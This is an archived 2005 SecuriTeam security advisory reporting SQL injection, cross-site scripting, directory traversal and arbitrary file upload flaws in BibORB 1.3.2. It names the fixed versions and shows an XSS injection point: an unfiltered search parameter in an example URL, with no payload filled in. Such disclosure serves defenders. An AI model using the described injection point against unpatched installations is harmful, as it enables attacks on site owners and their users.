[UNIX] Multiple Vulnerabilities In BibORB
From: SecuriTeam (support_at_securiteam.com)
Date: 02/21/05
- Previous message: SecuriTeam: "[UNIX] Multiple Vulnerabilities in glFTPd's Plugins"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 21 Feb 2005 10:35:34 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Vulnerabilities In BibORB
------------------------------------------------------------------------
SUMMARY
<http://biborb.glymn.net/doku.php> BibORB is "a web-based solution to
manage and share BibTeX bibliographies. It offers an easy way to edit,
import or export BibTeX references and proposes a system for archiving
electronic versions of papers contained in bibliographies".
Multiple vulnerabilities were found in BibORB that result in SQL
injection, XSS, directory traversal and arbitrary file upload.
DETAILS
Vulnerable Systems:
* BibORB version 1.3.2
Immune Systems:
* BibORB version 1.3.2 with security update
* BibORB version 1.3.3 RC1
Cross Site Scripting
Some variables such as search are not filtered, so XSS is possible.
http://path/to/biborb/bibindex.php?mode=displaysearch&search=